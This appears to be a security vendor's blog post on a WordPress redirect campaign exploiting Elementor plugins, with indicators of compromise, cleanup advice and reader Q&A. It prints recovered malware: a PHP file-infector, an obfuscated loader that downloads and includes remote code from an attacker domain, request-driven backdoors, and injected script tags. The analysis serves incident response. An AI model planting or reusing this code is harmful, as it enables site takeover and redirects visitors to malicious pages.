Attacks targeting vulnerabilities in WordPress themes and plugins have only aggravated in the past few months. The already ongoing attack campaign on WordPress plugins – Elementor Pro, The Ultimate Addons of Elementor & Astra Theme seem to have taken a new turn with redirection hack campaigns surfacing redirecting users to questionable websites like
- digestcolect [.] com,
- js[.]donatelloflowfirstly.ga,
- track[.]developfirstline[.]com/t.js?s=5,
- deliverynotforme[.]best,
- 0.beerockstars[.]ga/?p=me3gmnbugm5gi3bpgq3tknq&sub2=mtrolley83,
- 0.directedmyfounds[.]ga/?p=gi3tazrwga5gi3bpgizdgmq&sub2=mstimens3,
- well.linetoadsactive[.]com/m.js?n=nb5,
- 0.realhelpcompany[.]ga,
- fast.helpmart[.]ga/m[.]js?w=085,
- dock.lovegreenpencils[.]ga/m.js?n=nb5,
- cht.secondaryinformtrand[.]com/m.js?n=nb5,
- main.travelfornamewalking[.]ga/,
- irc.lovegreenpencils[.]ga/, etc.
Both Elementor and Ultimate Addons for Elementor have issued updates to patch these security issues, so please update to the following versions if not done already:
- Elementor Pro: 2.9.4
- Ultimate Addons for Elementor: 1.24.2
Related hack – We have also seen WordPress websites redirecting to track. developfirstline[.com]/t.js?s=5′ type=’text/javascript
What We Know So Far…
One common symptom shown by the affected websites is – Redirection.
That said, there are other symptoms as well that hint at the attack:
- Gibberish files added in the website root directory
- Unauthenticated admin users added to the WordPress admin area
- Unknown files and folders in /wp-content/uploads/elementor/custom-icons/
- Unknown files in website root such as
wp-xmlrpc.phpwp-cl-plugin.php
- Thousands of unknown malicious javascript & PHP files added to the file system
What Does Malicious ‘tap.digestcolect.com/r.php?id=0 spam/’ Website Redirection Code Look Like?
- The following code was found under a file named ‘hjghjerg‘:
<?php $lastRunLog = "./debugs.log";
if (file_exists($lastRunLog)) {
$lastRun = file_get_contents($lastRunLog);
if (time() - $lastRun >= 6400) {
search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
file_put_contents($lastRunLog, time());
}
} else {
search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
file_put_contents( './debugs.log', time());
}
function search_file($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {
@search_file( $dir,"index");
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
@search_file( $dir,"index");
return;
}
}
...
function search_file_js($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {
@search_file_js( $dir,".js");
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
@search_file_js( $dir,".js");
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
make_it_js($path);
} }else if($value != "." && $value != "..") {
search_file_js($path, $file_to_search);
}
}
}
function make_it_js($f){
$g = file_get_contents($f);
if (strpos($g, 'var') !== false) {
$g = file_get_contents($f);
if (strpos($g, 'mndfhghjf') !== false) {
} else {
$l2 = "";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'mndfhghjf') !== false) {
}
}
}
}
function make_it($f){
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {
} else {
$l2 = "";
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {
}
}
}
- This piece of code was found inside the file header.php:
<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode";
$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115);
$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));
$c1 = chr(104);
@file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1); ?><?php if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).
..
chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); $z3 = $b2($_REQUEST[chr(100).chr(49)]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } ?><?php if(isset($_GET[5]) && md5($_GET[5]) == "37147ec1ab66861d6e2ef8f672cb2c0b") {function _1896550334($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*","");return $a[$i];} function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];if(3404<mt_rand(443,2956))session_get_cookie_params($_COOKIE,$_0,$_POST,$_0);}$_1=l__0(_1896550334(0)) .l__0(_1896550334(1)) .l__0(_1896550334(2)) .l__0(_1896550334(3));if(!empty($_1)){$_1=str_rot13(@pack(_1896550334(4),strrev($_1)));if(isset($_1)){$_2=create_function(_1896550334(5),$_1);$_2();exit();}}else{echo base64_decode("bG9jYWwtZXJyb3Itbm90LWZvdW5k");}die();} ?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>
- This code was found in some core theme files:
<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
How to Fix the Digestcolect [.] com Redirect?
If your website is redirecting or showing other symptoms of the hack, you can quicken your incident response by doing the following:
- Start by checking favorite files that attract hackers like functions.php, wp-config.php & index.php
- Compare the core WordPress files with the one on your server to check if hackers might have infected core files
- Scan your website with an online malware scanner.
- Check the database for unfamiliar admins and users
- Check your root directory for gibberish files
You can follow our WordPress redirection removal guide for more thorough malware removal or follow this step-by-step tutorial for the same.
If the redirection still persists, it is quite possible that hackers have also injected backdoors on your website. This usually requires an in-depth malware scan with code review to clean the website.
Also check out: Step-by-Step WordPress Malware Removal Guide
Not infected? Secure Your Website
Lucky that you dodged the exploit. But don’t play on chances. It’s better to secure your website now. A premium firewall like Astra Security goes a long way in securing your website with the 24×7 monitoring and protection from attacks like JS injection, SQLi, CSRF, XSS, Bad bots, RFI, LFI, and a hundred others.
With a multitude of additional security tools such as Malware Scanner, Country Blocking, IP blocking, Astra security a cakewalk for businesses and blogs alike.
Hi can you tell me about wordpress backdoor hacks and how can I defend from happening this to me?
Hi James! A WordPress backdoor is the code which allows an attacker unauthorized and persistent access to the server. Often it is a malicious file hidden somewhere. Therefore, the threat could be from anywhere. Later on, it can be a time and resource consuming process to remove WordPress backdoors. For more info, visit here: https://www.getastra.com/blog/911/wordpress-backdoor-hack/
Hello, what features does the Astra firewall offers along with scanner for WordPress security, and can you provide more info on pricing and details?
Hi Ament! Thanks for responding to the article. You can visit here for features and more information of Astra firewall: https://www.getastra.com/wordpress-firewall and for pricing visit here: https://www.getastra.com/pricing
Hi Astra, my WordPress website is showing some strange Japanese content on google search. Is my website hacked? If yes, how can i solve it?
Thanks for responding to the article. In a Japanese keyword hack, auto generated Japanese text starts to appear on your site. This particular Blackhat SEO technique hijacks Google search results by displaying Japanese words in the title and description of the infected pages. It happens when different web pages are shown to search engines and normal visitors. For more information on removal visit here: https://www.getastra.com/blog/911/japanese-keyword-hack/
Hello, how i can fix the redirection hack of WordPress? I have a site which is redirecting to strange websites and I want to fix it myself.
Hi Wysong! Thanks for responding to the article. A WordPress malware redirect hack is a common form of attack where the visitors to the infected website are automatically redirected to phishing sites or malicious websites. For more information visit here: https://www.getastra.com/blog/911/wordpress-redirect-hack/
Hi there, I have a query. Is there any chance that hackers upload files using a file manager that affects website performance?
Hi Foster! Yes, Malicious file uploaders allow hackers to upload .php files etc to the server which could be used to further infect the site. The consequences could include complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement.
Hey, I think my database has some infected files. In which tables I can possibly find them? It’s a wordpress site.
Hi Paul! Sorry to hear that. For any WordPress website, the database is the biggest asset. It stores all the crucial information of a website i.e. user info, site URLs, posts, pages, comments, custom fields, etc. An improperly secured WordPress database is like an open invitation to hackers. For more info, visit here: https://www.getastra.com/blog/911/how-to-secure-wordpress-database/
Hi there, can you tell me about those common files that have a high chance of getting hacked? I own a website running on WordPress.
Hi Catherine! Thanks for responding to the article. You can go through this article to know more info on common files that get hacked and how to protect the: https://www.getastra.com/blog/911/wordpress-files-hacked-wp-config-php-hack/
Hey can you tell me more about the features that Astra firewall comes with? I would like to know more before opting for it 🙂
Hi Miller! Thanks for responding to the article and also for showing interest in Astra. You don’t have to worry about any malware, credit card hack, SQLi, XSS, SEO Spam, comments spam, brute force & 100+ types of threats. This means you can get rid of other security plugins & let Astra take care of it all.You can know more info about features and other here: https://www.getastra.com/features